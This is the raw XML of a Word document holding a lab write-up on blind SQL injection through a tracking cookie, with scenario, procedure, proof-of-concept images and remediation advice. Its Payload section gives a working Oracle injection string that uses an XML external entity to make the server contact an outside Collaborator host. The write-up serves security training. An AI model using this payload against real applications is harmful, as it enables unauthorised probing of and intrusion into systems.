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EE5E" w14:textId="10D20EBB" w:rsidR="00320924" w:rsidRDefault="004A3E86" w:rsidP="004A3E86">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>SCENARIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E47D056" w14:textId="1BE730AC" w:rsidR="004A3E86" w:rsidRPr="00BA0263" w:rsidRDefault="00BA0263" w:rsidP="00BA0263">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The application is vulnerable to a blind SQL Injection because it </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA0263">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA0263">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>The SQL query is executed asynchronously and has no effect on the application's response. However, you can trigger out-of-band interactions with an external domain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">. We will try to force the server </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA0263">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">to cause a DNS lookup to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA0263">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:r w:rsidR="008B1E1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Suite’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA0263">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Collaborator</w:t>
      </w:r>
      <w:r w:rsidR="00403572">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB7B851" w14:textId="77777777" w:rsidR="004A3E86" w:rsidRDefault="004A3E86" w:rsidP="00621ECC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E8AB870" w14:textId="23B9683B" w:rsidR="004A3E86" w:rsidRDefault="004A3E86" w:rsidP="00621ECC">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PROCEDURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB11C9E" w14:textId="22CB3D7C" w:rsidR="004A3E86" w:rsidRDefault="00065992" w:rsidP="0054787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Open the application and send the request for homepage to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BurpSuite’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Repeater.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6653C038" w14:textId="14D28735" w:rsidR="00D25425" w:rsidRDefault="00D25425" w:rsidP="0054787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Notice that even if we make any changes to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D25425">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tracking ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D362BE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cookie,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> we can see no changes</w:t>
      </w:r>
      <w:r w:rsidR="00F736B3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3881E8" w14:textId="12BF8D1A" w:rsidR="00D362BE" w:rsidRDefault="00D362BE" w:rsidP="0054787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Open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BurpSuite’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Collaborator Client and copy its address and using that we will craft a Payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123C42F2" w14:textId="6033BDE8" w:rsidR="00F736B3" w:rsidRPr="0054787A" w:rsidRDefault="00D362BE" w:rsidP="0054787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Now inject the payload in place of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TrackingID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> token value</w:t>
      </w:r>
      <w:r w:rsidR="00FB2116">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and when we click Poll </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00FB2116">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Now</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00FB2116">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> we can see requests made to our server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BB615B" w14:textId="77777777" w:rsidR="004A3E86" w:rsidRDefault="004A3E86" w:rsidP="00621ECC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="353F6CB2" w14:textId="6D539F0F" w:rsidR="004A3E86" w:rsidRDefault="00912355" w:rsidP="00621ECC">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PAYLOAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D860A3" w14:textId="1E2D0A5D" w:rsidR="00912355" w:rsidRPr="0082645D" w:rsidRDefault="0082645D" w:rsidP="0082645D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0082645D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x'+UNION+SELECT+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0082645D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EXTRACTVALUE(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0082645D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xmltype('&lt;%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f&gt;&lt;!DOCTYPE+root+[+&lt;!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/"&gt;+%25remote%3b]&gt;'),'/l')+FROM+dual--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B92B472" w14:textId="77777777" w:rsidR="00912355" w:rsidRDefault="00912355" w:rsidP="00621ECC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E4D87D9" w14:textId="77777777" w:rsidR="00A554C7" w:rsidRDefault="00A554C7" w:rsidP="00621ECC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="373C7BDD" w14:textId="77777777" w:rsidR="00A554C7" w:rsidRDefault="00A554C7" w:rsidP="00621ECC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1761CDFD" w14:textId="77777777" w:rsidR="00A554C7" w:rsidRDefault="00A554C7" w:rsidP="00621ECC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="070BB64F" w14:textId="77777777" w:rsidR="00A554C7" w:rsidRDefault="00A554C7" w:rsidP="00621ECC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D26ADC0" w14:textId="77777777" w:rsidR="00A554C7" w:rsidRDefault="00A554C7" w:rsidP="00621ECC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D7E699E" w14:textId="6A7AA875" w:rsidR="00A554C7" w:rsidRDefault="00A554C7" w:rsidP="00621ECC">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PROOF OF CONCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3698C0F3" w14:textId="7E9D7893" w:rsidR="00A554C7" w:rsidRDefault="006F7D1B" w:rsidP="00621ECC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F7D1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="742121FF" wp14:editId="7A27AB11">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3841115</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4944110" cy="2619375"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="9484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57321" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4944110" cy="2619375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00A554C7" w:rsidRPr="00A554C7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3B72B9A4" wp14:editId="349CCB70">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5493385" cy="3589020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="204204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41839" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5493385" cy="3589020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0763C3BD" w14:textId="77777777" w:rsidR="00A554C7" w:rsidRDefault="00A554C7" w:rsidP="00621ECC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BC52545" w14:textId="0BE445A2" w:rsidR="00912355" w:rsidRDefault="00C769EB" w:rsidP="00621ECC">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REMEDIATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401E88A8" w14:textId="77777777" w:rsidR="007D6446" w:rsidRPr="007D6446" w:rsidRDefault="007D6446" w:rsidP="007D6446">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6446">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Parameterized Queries:</w:t>
      </w:r>
      <w:r w:rsidRPr="007D6446">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> The best way to prevent SQL injection is by using parameterized queries (also known as prepared statements). This ensures user input is always treated as data and not executable code. Libraries that support parameterized queries include JDBC in Java, PDO in PHP, and many more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6D7C34" w14:textId="77777777" w:rsidR="007D6446" w:rsidRPr="007D6446" w:rsidRDefault="007D6446" w:rsidP="007D6446">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6446">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Object-Relational Mapping (ORM) Libraries:</w:t>
      </w:r>
      <w:r w:rsidRPr="007D6446">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Using ORM frameworks can also reduce the risk of SQL injection. These libraries typically use parameterized queries, and they abstract direct SQL queries, reducing the risk of SQLi by avoiding the need to write direct SQL code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7942DBA9" w14:textId="77777777" w:rsidR="007D6446" w:rsidRPr="007D6446" w:rsidRDefault="007D6446" w:rsidP="007D6446">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6446">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use of Stored Procedures:</w:t>
      </w:r>
      <w:r w:rsidRPr="007D6446">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Rather than forming raw SQL commands with string concatenation, use stored procedures in the database. These procedures will prevent user input from being executed as SQL commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F1DD81" w14:textId="77777777" w:rsidR="007D6446" w:rsidRPr="007D6446" w:rsidRDefault="007D6446" w:rsidP="007D6446">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6446">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Input Validation:</w:t>
      </w:r>
      <w:r w:rsidRPr="007D6446">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Input validation is essential. Use a whitelist of accepted values, rather than trying to filter out potentially dangerous characters. Reject any input that is not strictly necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCB6220" w14:textId="77777777" w:rsidR="007D6446" w:rsidRPr="007D6446" w:rsidRDefault="007D6446" w:rsidP="007D6446">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6446">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Database User Privileges:</w:t>
      </w:r>
      <w:r w:rsidRPr="007D6446">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensure that the database user associated with the web application does not have more privileges than it needs. Limit its access only to specific tables or stored procedures. If the application only needs to read data, then only give it read access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275E78CD" w14:textId="0A0F40F8" w:rsidR="000316F7" w:rsidRPr="007D6446" w:rsidRDefault="007D6446" w:rsidP="001E30CF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6446">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Hide Database Errors: </w:t>
      </w:r>
      <w:r w:rsidRPr="007D6446">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Never show database error messages to the end-users. Detailed error messages can give attackers hints about the database structure. Instead, use generic error messages.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="000316F7" w:rsidRPr="007D6446" w:rsidSect="00621E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6BCD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="96522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E85A6C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FB384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1321648">
    <w:abstractNumId w:val="0"/>
  </w:num>
